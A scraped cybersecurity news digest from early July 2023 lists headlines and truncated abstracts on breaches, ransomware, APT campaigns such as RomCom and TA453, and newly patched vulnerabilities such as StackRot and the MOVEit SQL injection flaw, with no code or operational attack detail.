Global Retailers Must Keep an Eye on Their SaaS Stack Full Text
Abstract
Brick-and-mortar retailers and e-commerce sellers may be locked in a fierce battle for market share, but one area both can agree on is the need to secure their SaaS stack. From communications tools to order management and fulfillment systems, much of today's critical retail software lives in SaaS apps in the cloud. Securing those applications is crucial to ongoing operations, chain management, and business continuity. Breaches in retail send out seismic shockwaves. Ten years later, many still remember one national retailer that had 40 million credit card records stolen. Those attacks have continued. According to Verizon's Data Breach Investigations Report, last year saw 629 cybersecurity incidents in the sector. Clearly, retailers must take concrete steps to secure their SaaS stack. And yet, securing applications is complicated. Retailers tend to have multiple tenants of apps, which leads to confusion over which instances of the application were already secured and whicThe Hacker News
July 10, 2023 – Breach
A flaw in Revolut US payments resulted in the theft of $20 Million Full Text
Abstract
A zero-day vulnerability in the Revolut payment systems allowed threat actors to steal more than $20 million in early 2022. In early 2022, threat actors exploited a zero-day flaw in Revolut payment systems to steal more than $20 million, reported...Security Affairs
July 10, 2023 – Insider Threat
Former employee charged for attacking water treatment plant Full Text
Abstract
A former employee of Discovery Bay Water Treatment Facility in California was indicted by a federal grand jury for intentionally attempting to cause malfunction to the facility's safety and protection systems.BleepingComputer
July 10, 2023 – Breach
35 Million Indonesians’ Passport Data for Sale on Dark Web for $10K Full Text
Abstract
Indonesian security researcher Teguh Aprianto revealed on Twitter last week that a hacker had put up for sale Indonesian passport holders' details including their full names, birth dates, gender, passport numbers, and passport validity dates.Cyware
July 10, 2023 – Attack
RomCom RAT Targeting NATO and Ukraine Support Groups Full Text
Abstract
The threat actors behind the RomCom RAT have been suspected of phishing attacks targeting the upcoming NATO Summit in Vilnius as well as an identified organization supporting Ukraine abroad. The findings come from the BlackBerry Threat Research and Intelligence team, which found two malicious documents submitted from a Hungarian IP address on July 4, 2023. RomCom, also tracked under the names Tropical Scorpius, UNC2596, and Void Rabisu, was recently observed staging cyber attacks against politicians in Ukraine who are working closely with Western countries and a U.S.-based healthcare organization involved with aiding refugees fleeing the war-torn country. Attack chains mounted by the group are geopolitically motivated and have employed spear-phishing emails to point victims to cloned websites hosting trojanized versions of popular software. Targets include militaries, food supply chains, and IT companies. The latest lure documents identified by BlackBerry impersonate UkrainiaThe Hacker News
July 10, 2023 – Privacy
France’s government is giving the police more surveillance power Full Text
Abstract
The French government is going to grant law enforcement the power to spy on suspects through smartphones and other devices. French legislators are going to approve a justice reform bill that also gives more power to law enforcement, allowing them...Security Affairs
July 10, 2023 – Breach
Razer investigates data breach claims, resets user sessions Full Text
Abstract
Gaming gear company Razer reacted to recent rumors of a massive data breach with a short statement on Twitter, letting users know that they started an investigation into the matter.BleepingComputer
July 10, 2023 – General
ISACA joins ECSO to strengthen cybersecurity and digital skills in Europe Full Text
Abstract
ISACA is joining the European Cyber Security Organisation (ECSO). The membership will work to accelerate ECSO and ISACA’s shared commitment to advancing cybersecurity, fostering collaboration and driving digital trust across Europe.Cyware
July 10, 2023 – Criminals
Hackers Steal $20 Million by Exploiting Flaw in Revolut’s Payment Systems Full Text
Abstract
Malicious actors exploited an unknown flaw in Revolut's payment systems to steal more than $20 million of the company's funds in early 2022. The development was reported by the Financial Times, citing multiple unnamed sources with knowledge of the incident. The breach has not been disclosed publicly. The fault stemmed from discrepancies between Revolut's U.S. and European systems, causing funds to be erroneously refunded using its own money when some transactions were declined. The problem was first detected in late 2021. But before it could be closed, the report said organized criminal groups leveraged the loophole by "encouraging individuals to try to make expensive purchases that would go on to be declined." The refunded amounts would then be withdrawn from ATMs. The exact technical details associated with the flaw are currently unclear. About $23 million was stolen in total, with some funds recovered by pursuing those who had withdrawn cash. The massThe Hacker News
July 10, 2023 – Solution
Streamlining security operations with automated incident response Full Text
Abstract
Automated incident response solutions help reduce the mean time to respond to incidents, address known security threats, and also minimize alert fatigue. Learn more about these solutions from Wazuh, the open source XDR/SIEM platform.BleepingComputer
July 10, 2023 – General
Midyear Health Data Breach Analysis: The Top Culprits Full Text
Abstract
The HHS HIPAA Breach Reporting Tool shows that 336 major health data breaches affected nearly 41.4 million individuals between January 1st and June 30th this year - nearly double the number affected during the same period last year.Cyware
July 10, 2023 – Phishing
New Phishing Attack Spoofs Microsoft 365 Authentication System Full Text
Abstract
According to researchers at Vade, the attack email includes a harmful HTML attachment with JavaScript code. This code is designed to gather the recipient’s email address and modify the page using data from a callback function’s variable.Cyware
July 09, 2023
Charming Kitten hackers use new ‘NokNok’ malware for macOS Full Text
Abstract
Security researchers observed a new campaign they attribute to the Charming Kitten APT group where hackers used new NokNok malware that targets macOS systems.BleepingComputer
July 9, 2023 – Malware
Two spyware sending data of more than 1.5M users to China were found in Google Play Store Full Text
Abstract
Two apps on the Google Play Store with more than 1.5 million downloads have been discovered spying on users and sending data to China. Researchers from cybersecurity firm Pradeo discovered two malicious apps on Google Play hinding spyware and spying...Security Affairs
July 9, 2023 – General
Security Affairs newsletter Round 427 by Pierluigi Paganini – International edition Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Google...Security Affairs
July 8, 2023 – Ransomware
Tailing Big Head Ransomware’s Variants, Tactics, and Impact Full Text
Abstract
The Big Head ransomware displays a fake Windows update to deceive victims, communicates with the threat actor via a Telegram bot, and drops ransom notes with contact information.Cyware
July 08, 2023 – Privacy
Two Spyware Apps on Google Play with 1.5 Million Users Sending Data to China Full Text
Abstract
Two file management apps on the Google Play Store have been discovered to be spyware, putting the privacy and security of up to 1.5 million Android users at risk. These apps engage in deceptive behaviour and secretly send sensitive user data to malicious servers in China. Pradeo, a leading mobile security company, has uncovered this alarming infiltration. The report shows that both spyware apps, namely File Recovery and Data Recovery (com.spot.music.filedate) with over 1 million installs, and File Manager (com.file.box.master.gkd) with over 500,000 installs, are developed by the same group. These seemingly harmless Android apps use similar malicious tactics and automatically launch when the device reboots without user input. Contrary to what they claim on the Google Play Store, where both apps assure users that no data is collected, Pradeo's analytics engine has found that various personal information is collected without users' knowledge. Stolen data includes contact listThe Hacker News
July 8, 2023 – Malware
WISE REMOTE Stealer Unleashed : Unveiling Its Multifaceted Malicious Arsenal Full Text
Abstract
The WISE REMOTE Stealer is an advanced information stealer and Remote Access Trojan (RAT) that is coded in the Go programming language and utilizes code manipulation techniques to evade antivirus detection, making it difficult to detect and mitigate.Cyware
July 8, 2023 – Breach
Global Translation Service Exposed Highly Sensitive Records Online Full Text
Abstract
Website Planet‘s security researcher Jeremiah Fowler discovered a non-password-protected database that contained over 25,000 records, all publicly exposed, including ‘highly sensitive’ documents.Cyware
July 8, 2023 – Vulnerabilities
Google addressed 3 actively exploited flaws in Android Full Text
Abstract
Google released July security updates for Android that addressed tens of vulnerabilities, including three actively exploited flaws. July security updates for Android addressed more than 40 vulnerabilities, including three flaws that were actively...Security Affairs
July 8, 2023 – Government
Vulnerabilities in PiiGAB Product Could Expose Industrial Organizations to Attacks Full Text
Abstract
The US Cybersecurity and Infrastructure Security Agency (CISA) on Thursday published an advisory describing the vulnerabilities discovered by researchers at Radboud University in PiiGAB M-Bus 900s gateway/converter.Cyware
July 8, 2023
Iran-linked APT TA453 targets Windows and macOS systems Full Text
Abstract
Iran-linked APT group tracked TA453 has been linked to a new malware campaign targeting both Windows and macOS systems. The Iran-linked threat actor TA453 has been linked to a malware campaign that targets both Windows and macOS. TA453 is a nation-state...Security Affairs
July 7, 2023 – Government
TMF announces five new digital services and cybersecurity investments Full Text
Abstract
The Labor Department will use the $15.2 million in the most recent batch of funding for zero-trust architecture. The EPA will put its $2.5 million toward the cybersecurity of its analytical radiation data system.Cyware
July 07, 2023 – Phishing
Vishing Goes High-Tech: New ‘Letscall’ Malware Employs Voice Traffic Routing Full Text
Abstract
Researchers have issued a warning about an emerging and advanced form of voice phishing ( vishing ) known as " Letscall ." This technique is currently targeting individuals in South Korea. The criminals behind "Letscall" employ a multi-step attack to deceive victims into downloading malicious apps from a counterfeit Google Play Store website. Once the malicious software is installed, it redirects incoming calls to a call center under the control of the criminals. Trained operators posing as bank employees then extract sensitive information from unsuspecting victims. To facilitate the routing of voice traffic, "Letscall" utilizes cutting-edge technologies such as voice over IP (VOIP) and WebRTC. It also makes use of Session Traversal Utilities for NAT (STUN) and Traversal Using Relays around NAT (TURN) protocols, including Google STUN servers, to ensure high-quality phone or video calls and bypass NAT and firewall restrictions. The "Letscall&quoThe Hacker News
July 7, 2023 – Breach
Bangladesh government website leaked data of millions of citizens Full Text
Abstract
A researcher recently discovered that a Bangladesh government website leaks the personal data of citizens. The researcher Viktor Markopoulos discovered a Bangladeshi government website that was leaking the personal information of millions of Bangladesh...Security Affairs
July 7, 2023 – General
Cybercriminals can Break Voice Authentication with 99% Success Rate Full Text
Abstract
Computer scientists at the University of Waterloo have discovered a method of attack that can successfully bypass voice authentication security systems with up to a 99% success rate after only six tries.Cyware
July 07, 2023 – Vulnerabilities
Another Critical Unauthenticated SQLi Flaw Discovered in MOVEit Transfer Software Full Text
Abstract
Progress Software has announced the discovery and patching of a critical SQL injection vulnerability in MOVEit Transfer, popular software used for secure file transfer. In addition, Progress Software has patched two other high-severity vulnerabilities. The identified SQL injection vulnerability, tagged as CVE-2023-36934 , could potentially allow unauthenticated attackers to gain unauthorized access to the MOVEit Transfer database. SQL injection vulnerabilities are a well-known and dangerous security flaw that allows attackers to manipulate databases and run any code they want. Attackers can send specifically designed payloads to certain endpoints of the affected application, which could change or expose sensitive data in the database. The reason CVE-2023-36934 is so critical is that it can be exploited without having to be logged in. This means that even attackers without valid credentials can potentially exploit the vulnerability. However, as of now, there have been no reports ofThe Hacker News
July 7, 2023 – Policy and Law
A man has been charged with a cyber attack on the Discovery Bay water treatment facility Full Text
Abstract
A man from Tracy, California, has been charged with a computer attack on the Discovery Bay water treatment facility. Rambler Gallo (53), a man from Tracy (California) has been charged with intentionally causing damage to a computer after he allegedly...Security Affairs
July 7, 2023 – Government
Truebot’s Activity Spikes, U.S and Canada Authorities Issue Warning Full Text
Abstract
A joint advisory from the CISA, the FBI, the MS-ISAC, and the Canadian Centre for Cyber Security (CCCS) discovered a rise in the use of the Truebot malware by threat actors. Notably, these actors are increasingly exploiting the CVE-2022-31199 flaw to target organizations in the U.S. and Canada with ... Read MoreCyware
July 07, 2023 – Vulnerabilities
Mastodon Social Network Patches Critical Flaws Allowing Server Takeover Full Text
Abstract
Mastodon, a popular decentralized social network, has released a security update to fix critical vulnerabilities that could expose millions of users to potential attacks. Mastodon is known for its federated model, consisting of thousands of separate servers called "instances," and it has over 14 million users across more than 20,000 instances. The most critical vulnerability, CVE-2023-36460 , allows hackers to exploit a flaw in the media attachments feature, creating and overwriting files in any location the software could access on an instance. This software vulnerability could be used for DoS and arbitrary remote code execution attacks, posing a significant threat to users and the broader Internet ecosystem. If an attacker gains control over multiple instances, they could cause harm by instructing users to download malicious applications or even bring down the entire Mastodon infrastructure. Fortunately, there is no evidence of this vulnerability being exploited so faThe Hacker News
July 7, 2023 – Vulnerabilities
Progress warns customers of a new critical flaw in MOVEit Transfer software Full Text
Abstract
Progress released security patches for a new critical SQL injection vulnerability affecting its MOVEit Transfer software. Progress is informing customers of a new critical SQL injection vulnerability, tracked as CVE-2023-36934, in its MOVEit Transfer...Security Affairs
July 7, 2023 – General
ChatGPT’s unknown potential keeps us guessing Full Text
Abstract
A survey by Malwarebytes revealed that a majority of respondents do not trust the information produced by ChatGPT and believe it poses potential safety and security risks.Cyware
July 07, 2023 – Solution
Close Security Gaps with Continuous Threat Exposure Management Full Text
Abstract
CISOs, security leaders, and SOC teams often struggle with limited visibility into all connections made to their company-owned assets and networks. They are hindered by a lack of open-source intelligence and powerful technology required for proactive, continuous, and effective discovery and protection of their systems, data, and assets. As advanced threat actors constantly search for easily exploitable vulnerabilities around the clock, CISOs are in pursuit of improved methods to reduce threat exposures and safeguard their assets, users, and data from relentless cyber-attacks and the severe consequences of breaches. In response to this need, an emerging solution addressing the most critical priorities at the initial stage of the attack chain has provided security leaders with a new tool to manage their most pressing threat exposures at their origin. Leading analyst firm Gartner Research describes the solution: "By 2026, organizations prioritizing their security investments basedThe Hacker News
July 7, 2023 – Government
CISA and FBI warn of Truebot infecting US and Canada based organizations Full Text
Abstract
CISA and the FBI warned today of a new Truebot variant employed in attacks against organizations in the United States and Canada. A new variant of the Truebot malware was used in attacks against organizations in the United States and Canada. Threat...Security Affairs
July 7, 2023 – Vulnerabilities
CISA, FBI, MS-ISAC, and CCCS Warn of Truebot Infecting US and Canadian Organizations Full Text
Abstract
The threat actors behind the attacks compromised target networks by exploiting a critical remote code execution (RCE) vulnerability in the Netwrix Auditor software tracked as CVE-2022-31199.Cyware
July 07, 2023 – Ransomware
BlackByte 2.0 Ransomware: Infiltrate, Encrypt, and Extort in Just 5 Days Full Text
Abstract
Ransomware attacks are a major problem for organizations everywhere, and the severity of this problem continues to intensify. Recently, Microsoft's Incident Response team investigated the BlackByte 2.0 ransomware attacks and exposed these cyber strikes' terrifying velocity and damaging nature. The findings indicate that hackers can complete the entire attack process, from gaining initial access to causing significant damage, in just five days. They waste no time infiltrating systems, encrypting important data, and demanding a ransom to release it. This shortened timeline poses a significant challenge for organizations trying to protect themselves against these harmful operations. BlackByte ransomware is used in the final stage of the attack, using an 8-digit number key to encrypt the data. To carry out these attacks, hackers use a powerful combination of tools and techniques. The investigation revealed that they take advantage of unpatched Microsoft Exchange Servers—anThe Hacker News
July 07, 2023 – Vulnerabilities
Google Releases Android Patch Update for 3 Actively Exploited Vulnerabilities Full Text
Abstract
Google has released its monthly security updates for the Android operating system, addressing 46 new software vulnerabilities. Among these, three vulnerabilities have been identified as actively exploited in targeted attacks. One of the vulnerabilities tracked as CVE-2023-26083 is a memory leak flaw affecting the Arm Mali GPU driver for Bifrost, Avalon, and Valhall chips. This particular vulnerability was exploited in a previous attack that enabled spyware infiltration on Samsung devices in December 2022. This vulnerability was regarded as serious enough to prompt the Cybersecurity and Infrastructure Security Agency (CISA) to issue a patching order for federal agencies in April 2023. Another significant vulnerability, identified as CVE-2021-29256, is a high-severity issue that affects specific versions of the Bifrost and Midgard Arm Mali GPU kernel drivers. This flaw permits an unprivileged user to gain unauthorized access to sensitive data and escalate privileges to the root levThe Hacker News
July 07, 2023 – Attack
JumpCloud Resets API Keys Amid Ongoing Cybersecurity Incident Full Text
Abstract
JumpCloud, a provider of cloud-based identity and access management solutions, has swiftly reacted to an ongoing cybersecurity incident that impacted some of its clients. As part of its damage control efforts, JumpCloud has reset the application programming interface (API) keys of all customers affected by this event, aiming to protect their valuable data. The company has informed the concerned clients about the critical nature of this move, reinforcing its commitment to safeguarding their operations and organizations. This API key reset will, however, disrupt certain functionalities like AD import, HRIS integrations, JumpCloud PowerShell modules, JumpCloud Slack apps, Directory Insights Serverless apps, ADMU, third-party zero-touch MDM packages, Command Triggers, Okta SCIM integration, Azure AD SCIM integration, Workato, Aquera, Tray, and more. Despite the potential disruptions, JumpCloud maintains that the key reset is for the greater good of its clients. For those needing assisThe Hacker News
July 07, 2023 – Malware
Cybersecurity Agencies Sound Alarm on Rising TrueBot Malware Attacks Full Text
Abstract
Cybersecurity agencies have warned about the emergence of new variants of the TrueBot malware. This enhanced threat is now targeting companies in the U.S. and Canada with the intention of extracting confidential data from infiltrated systems. These sophisticated attacks exploit a critical vulnerability ( CVE-2022-31199 ) in the widely used Netwrix Auditor server and its associated agents. This vulnerability enables unauthorized attackers to execute malicious code with the SYSTEM user's privileges, granting them unrestricted access to compromised systems. The TrueBot malware , linked with cybercriminal collectives Silence and FIN11, is deployed to siphon off data and disseminate ransomware, jeopardising the safety of numerous infiltrated networks. The cybercriminals gain their initial foothold by exploiting the cited vulnerability, then proceed to install TrueBot. Once they have breached the networks, they install the FlawedGrace Remote Access Trojan (RAT) to escalate their pThe Hacker News
July 6, 2023 – Malware
TeamsPhisher Tool Exploits Microsoft Teams to Deploy Malware Full Text
Abstract
A new tool available on GitHub can enable attackers to misuse a recently disclosed vulnerability in Microsoft Teams and automatically deliver malicious files to users' systems.Cyware
July 06, 2023 – Malware
Iranian Hackers’ Sophisticated Malware Targets Windows and macOS Users Full Text
Abstract
The Iranian nation-state actor known as TA453 has been linked to a new set of spear-phishing attacks that infect both Windows and macOS operating systems with malware. "TA453 eventually used a variety of cloud hosting providers to deliver a novel infection chain that deploys the newly identified PowerShell backdoor GorjolEcho," Proofpoint said in a new report. "When given the opportunity, TA453 ported its malware and attempted to launch an Apple flavored infection chain dubbed NokNok. TA453 also employed multi-persona impersonation in its unending espionage quest." TA453, also known by the names APT35, Charming Kitten, Mint Sandstorm, and Yellow Garuda, is a threat group linked to Iran's Islamic Revolutionary Guard Corps (IRGC) that has been active since at least 2011. Most recently, Volexity highlighted the adversary's use of an updated version of a Powershell implant called CharmPower (aka GhostEcho or POWERSTAR). In the attack sequence discoveThe Hacker News
July 6, 2023 – Vulnerabilities
Cisco warns of a flaw in Nexus 9000 series switches that allows modifying encrypted traffic Full Text
Abstract
Cisco warns of a high-severity vulnerability in Nexus 9000 series switches that can allow attackers to read or modify encrypted traffic. Cisco disclosed a high-severity vulnerability, tracked as CVE-2023-20185 (CVSS Score 7.4), in the Cisco ACI Multi-Site...Security Affairs
July 6, 2023 – Ransomware
RedEnergy: New Stealer-as-a-Ransomware Out in the Wild Full Text
Abstract
The recent detection of RedEnergy stealer-as-a-ransomware represents an advanced threat that combines stealthy data theft and encryption techniques to cause significant damage and seize control over its targets.Cyware
July 06, 2023 – Denial Of Service
Surviving the 800 Gbps Storm: Gain Insights from Gcore’s 2023 DDoS Attack Statistics Full Text
Abstract
Gcore Radar is a quarterly report prepared by Gcore that provides insights into the current state of the DDoS protection market and cybersecurity trends. This report offers you an understanding of the evolving threat landscape and highlights the measures required to protect against attacks effectively. It serves as an insight for businesses and individuals seeking to stay informed about the latest developments in cybersecurity. As we entered 2023, the cybersecurity landscape witnessed an increase in sophisticated, high-volume attacks. Here, we present the current state of the DDoS protection market based on Gcore's statistics. Key Highlights from Q1–Q2 The maximum attack power rose from 600 to 800 Gbps. UDP flood attacks were most common and amounted to 52% of total attacks, while SYN flood accounted for 24%. In third place was TCP flood. The most-attacked business sectors are gaming, telecom, and financial. The longest attack duration in the year's first half was seveThe Hacker News
July 6, 2023 – Vulnerabilities
StackRot, a new Linux Kernel privilege escalation vulnerability Full Text
Abstract
StackRot is s new security vulnerability in the Linux kernel that could be exploited to gain elevated privileges on a target system. A security vulnerability, dubbed StackRot was found impacting Linux versions 6.1 through 6.4. The issue, tracked...Security Affairs
July 6, 2023 – Breach
28,000 Employees Impacted by Data Breach at Pepsi Bottling Ventures Full Text
Abstract
Discovered on January 10, the data breach occurred between December 23, 2022, and January 19, 2023, and resulted in the personal, financial, and health information of the company’s employees being accessed by an unauthorized party.Cyware
July 06, 2023 – Vulnerabilities
Researchers Uncover New Linux Kernel ‘StackRot’ Privilege Escalation Vulnerability Full Text
Abstract
Details have emerged about a newly identified security flaw in the Linux kernel that could allow a user to gain elevated privileges on a target host. Dubbed StackRot ( CVE-2023-3269 , CVSS score: 7.8), the flaw impacts Linux versions 6.1 through 6.4. There is no evidence that the shortcoming has been exploited in the wild to date. "As StackRot is a Linux kernel vulnerability found in the memory management subsystem, it affects almost all kernel configurations and requires minimal capabilities to trigger," Peking University security researcher Ruihan Li said . "However, it should be noted that maple nodes are freed using RCU callbacks, delaying the actual memory deallocation until after the RCU grace period. Consequently, exploiting this vulnerability is considered challenging." Following responsible disclosure on June 15, 2023, it has been addressed in stable versions 6.1.37, 6.3.11, and 6.4.1 as of July 1, 2023, after a two-week effort led by Linus TorThe Hacker News
July 6, 2023 – General
Ransomware accounts for 54% of cyber threats in the health sector Full Text
Abstract
The European Union Agency for Cybersecurity (ENISA) releases its first cyber threat landscape report for the health sector. The European Union Agency for Cybersecurity (ENISA) releases today its first cyber threat landscape report for the health...Security Affairs
July 6, 2023 – Hacker
Crysis Threat Actors Use RDP Connections to Distribute Venus Ransomware Full Text
Abstract
ASEC recently discovered that Crysis ransomware attackers were scanning the internet, via brute force or dictionary attacks, for vulnerable RDP endpoints to install Venus ransomware on systems.Cyware
July 06, 2023 – Education
How Pen Testing can Soften the Blow on Rising Costs of Cyber Insurance Full Text
Abstract
As technology advances and organizations become more reliant on data, the risks associated with data breaches and cyber-attacks also increase. The introduction of data privacy laws, such as the GDPR, has made it mandatory for organizations to disclose breaches of personal data to those affected. As such, it has become essential for businesses to protect themselves from the financial and reputational costs of cyber incidents. One solution to help organizations protect themselves is cyber insurance, despite the rising costs of cyber insurance, where the average price in the U.S. rose 79% in the second quarter of 2022. Also, with strict eligibility requirements that have emerged in response to risk and sharp spikes in successful breaches during and post-COVID-19, cyber insurance remains essential for organizations to protect sensitive customer information and their own data from falling into the wrong hands. While cyber insurance is not a one-size-fits-all solution and may not coverThe Hacker News
July 6, 2023 – Vulnerabilities
CVE-2022-29303 flaw in SolarView product can be exploited in attacks against the energy sector Full Text
Abstract
A vulnerability in SolarView product can be exploited in attacks targeting organizations in the energy sector. Researchers from the cybersecurity firm VulnCheck reported that the vulnerability CVE-2022-29303 in the solar power monitoring Contec SolarView...Security Affairs
July 6, 2023 – Business
Node4 acquires ThreeTwoFour to strengthen its security capabilities Full Text
Abstract
The acquisition is Node4’s third significant growth purchase in the last 18 months, having also bought risual, an IT managed services and solutions provider and Tisski, a leading UK-based independent Microsoft Business applications partner.Cyware
July 06, 2023 – Attack
Silentbob Campaign: Cloud-Native Environments Under Attack Full Text
Abstract
Cybersecurity researchers have unearthed an attack infrastructure that's being used as part of a "potentially massive campaign" against cloud-native environments. "This infrastructure is in early stages of testing and deployment, and is mainly consistent of an aggressive cloud worm, designed to deploy on exposed JupyterLab and Docker APIs in order to deploy Tsunami malware , cloud credentials hijack, resource hijack, and further infestation of the worm," cloud security firm Aqua said . The activity, dubbed Silentbob in reference to an AnonDNS domain set up by the attacker, is said to be linked to the infamous cryptojacking group tracked as TeamTNT , citing overlaps in tactics, techniques, and procedures (TTPs). However, the involvement of an "advanced copycat" hasn't been ruled out. Aqua's investigation was prompted in the aftermath of an attack targeting its honeypot in early June 2023, leading to the discovery of four malicious contThe Hacker News
July 6, 2023 – General
Small organizations face security threats on a limited budget Full Text
Abstract
Small organizations face the same security threats as organizations overall but have fewer resources to address them, according to Netwrix. The most common security incidents are phishing, ransomware, and user account compromise.Cyware
July 06, 2023 – Criminals
INTERPOL Nabs Hacking Crew OPERA1ER’s Leader Behind $11 Million Cybercrime Full Text
Abstract
A suspected senior member of a French-speaking hacking crew known as OPERA1ER has been arrested as part of an international law enforcement operation codenamed Nervone, Interpol has announced. "The group is believed to have stolen an estimated USD 11 million -- potentially as much as 30 million -- in more than 30 attacks across 15 countries in Africa, Asia, and Latin America," the agency said . The arrest was made by authorities in Côte d'Ivoire early last month. Additional insight was provided by the U.S. Secret Service's Criminal Investigative Division and Booz Allen Hamilton DarkLabs. The financially motivated collective is also known by the aliases Common Raven, DESKTOP-GROUP, and NX$M$. Its modus operandi was first exposed by Group-IB and Orange CERT Coordination Center (Orange-CERT-CC) in November 2022, detailing its intrusions on banks, financial services, and telecom companies between March 2018 and October 2022. Earlier this January, Broadcom's SThe Hacker News
July 6, 2023 – Breach
Large Indian Tech Retailer Exposes Employee and Customer Data Full Text
Abstract
The tech retailer Poorvika had a non-password-protected data breach exposing sensitive employee and customer data. The breach included a vast number of records, including personal information, email addresses, tax invoices, and payment receipts.Cyware
July 5, 2023 – Ransomware
Ransomware Redefined: RedEnergy Stealer-as-a-Ransomware Full Text
Abstract
RedEnergy stealer uses a fake update campaign to target multiple industry verticals and possesses the ability to steal information from various browsers while also incorporating different modules for carrying out ransomware activities.Cyware
July 05, 2023 – Ransomware
RedEnergy Stealer-as-a-Ransomware Threat Targeting Energy and Telecom Sectors Full Text
Abstract
A sophisticated stealer-as-a-ransomware threat dubbed RedEnergy has been spotted in the wild targeting energy utilities, oil, gas, telecom, and machinery sectors in Brazil and the Philippines through their LinkedIn pages. The malware "possesses the ability to steal information from various browsers, enabling the exfiltration of sensitive data, while also incorporating different modules for carrying out ransomware activities," Zscaler researchers Shatak Jain and Gurkirat Singh said in a recent analysis. The goal, the researchers noted, is to couple data theft with encryption with the goal of inflicting maximum damage to the victims. The starting point for the multi-stage attack is a FakeUpdates (aka SocGholish) campaign that tricks users into downloading JavaScript-based malware under the guise of web browser updates. What makes it novel is the use of reputable LinkedIn pages to target victims, redirecting users clicking on the website URLs to a bogus landing pageThe Hacker News
July 5, 2023 – Malware
RedEnergy Stealer-as-a-Ransomware employed in attacks in the wild Full Text
Abstract
RedEnergy is a sophisticated stealer-as-a-ransomware that was employed in attacks targeting energy utilities, oil, gas, telecom, and machinery sectors. Zscaler ThreatLabz researchers discovered a new Stealer-as-a-Ransomware named RedEnergy used in attacks...Security Affairs
July 5, 2023 – Attack
European Entities Targeted in SmugX Campaign Full Text
Abstract
Check Point spotted a new campaign by a Chinese threat actor targeting diplomatic entities in Europe. Dubbed SmugX, the campaign uses HTML smuggling to deploy a new variant of PlugX RAT. The campaign reportedly overlaps with the activity of RedDelta and Mustang Panda. Organizations are advised to u ... Read MoreCyware
July 05, 2023 – Education
Secrets, Secrets Are No Fun. Secrets, Secrets (Stored in Plain Text Files) Hurt Someone Full Text
Abstract
Secrets are meant to be hidden or, at the very least, only known to a specific and limited set of individuals (or systems). Otherwise, they aren't really secrets. In personal life, a secret revealed can damage relationships, lead to social stigma, or, at the very least, be embarrassing. In a developer's or application security engineer's professional life, the consequences of exposing secrets can lead to breaches of security, data leaks, and, well, also be embarrassing. And while there are tools available for detecting source code and code repositories, there are few options for identifying secrets in plain text, documents, emails, chat logs, content management systems, and more. What Are Secrets? In the context of applications, secrets are sensitive information such as passwords, API keys, cryptographic keys, and other confidential data that an application needs to function but should not be exposed to unauthorized users. Secrets are typically stored securely and accessThe Hacker News
July 5, 2023 – Attack
The Port of Nagoya, the largest Japanese port, suffered a ransomware attack Full Text
Abstract
The Port of Nagoya, the largest port in Japan, suffered a ransomware attack that severely impacted its operations. The Port of Nagoya, in the Ise Bay, is the largest and busiest trading port in Japan, accounting for about 10% of the total trade value...Security Affairs
July 5, 2023 – Criminals
Ransomware Criminals Are Dumping Kids’ Private Files Online After School Hacks Full Text
Abstract
Complete sexual assault case folios containing these details were among more than 300,000 files dumped online in March after the 36,000-student Minneapolis Public Schools refused to pay a $1 million ransom.Cyware
July 05, 2023 – Malware
Node.js Users Beware: Manifest Confusion Attack Opens Door to Malware Full Text
Abstract
The npm registry for the Node.js JavaScript runtime environment is susceptible to what's called a manifest confusion attack that could potentially allow threat actors to conceal malware in project dependencies or perform arbitrary script execution during installation. "A npm package's manifest is published independently from its tarball," Darcy Clarke, a former GitHub and npm engineering manager, said in a technical write-up published last week. "Manifests are never fully validated against the tarball's contents." "The ecosystem has broadly assumed the contents of the manifest and tarball are consistent," Clarke added. The problem, at its core, stems from the fact that the manifest and package metadata are decoupled and that they are never cross-referenced against one another, thereby leading to unexpected behavior and misuse when there is a mismatch. As a result, a threat actor could exploit this loophole to publish a module with a maThe Hacker News
July 5, 2023 – Malware
NoName(057)16’s DDoSia Project’s gets an upgrade Full Text
Abstract
The DDoSia attack tool received an upgrade, it supports a new security mechanism to conceal the list of targets. Researchers at the cybersecurity firm Sekoia analyzed an updated variant of the DDoSia attack tool that was developed and used by the pro-Russia...Security Affairs
July 5, 2023 – Outage
Poly Network Loses Millions of Dollars in Crypto Assets Full Text
Abstract
The services of the company were suspended early Sunday and during the afternoon the company shared a Google spreadsheet showing crypto assets that have been stolen by the attackers.Cyware
July 05, 2023 – Privacy
Instagram’s Twitter Alternative ‘Threads’ Launch Halted in Europe Over Privacy Concerns Full Text
Abstract
Instagram Threads, the upcoming Twitter competitor from Meta, will not be launched in the European Union due to privacy concerns, according to Ireland's Data Protection Commission (DPC). The development was reported by the Irish Independent, which said the watchdog has been in contact with the social media giant about the new product and confirmed the release won't extend to the E.U. "at this point." Threads is Meta's answer to Twitter that's set for launch on July 6, 2023. It's billed as a "text-based conversation app" that allows Instagram users to "discuss everything from the topics you care about today to what'll be trending tomorrow." It also enables users to follow the same accounts they already follow on Instagram. A listing for the app has already appeared in the Apple App Store and Google Play Store , although it's yet to be available for download. The " App Privacy " section on the App Store indicThe Hacker News
July 5, 2023 – Privacy
Swedish data protection authority rules against the use of Google Analytics Full Text
Abstract
Swedish data protection watchdog warns companies against using Google Analytics due to the risk of surveillance operated by the US government. The Swedish data protection watchdog warned businesses against using Google Analytics due to the risk of surveillance...Security Affairs
July 5, 2023 – Criminals
Teen among suspects arrested in Android banking malware scheme Full Text
Abstract
Preliminary findings suggest that seven men, two women aged 19 to 27, and a 16-year-old facilitated the scam by providing their bank accounts, Internet banking credentials, and Singpass credentials to perpetrators for monetary gain.Cyware
July 5, 2023 – General
75% of consumers prepared to ditch brands hit by ransomware Full Text
Abstract
81% of consumers report feeling “very scared or worried” about their data being held by organizations lacking robust resilience against ransomware. After an attack, one in three consumers demands evidence of resilient backup and recovery strategies.Cyware
July 5, 2023 – Vulnerabilities
Ghostscript Bug Could Allow Rogue Documents to Run System Commands Full Text
Abstract
Ghostscript reads in PostScript program code, which describes how to construct the pages in a document, and converts it, or renders it, into a format more suitable for displaying or printing, such as raw pixel data or a PNG graphics file.Cyware
July 4, 2023 – Phishing
U.S. Law Firms Targeted in New GuLoader Campaign Full Text
Abstract
GuLoader is increasingly prevalent as a malware loader within phishing campaigns. Morphisec Labs uncovered a GuLoader campaign that has been targeting law firms (46.4%), alongside investment (17.9%) and healthcare (21.4%) firms, in the U.S. The campaign has been ongoing since April.Cyware
July 04, 2023 – Government
Swedish Data Protection Authority Warns Companies Against Google Analytics Use Full Text
Abstract
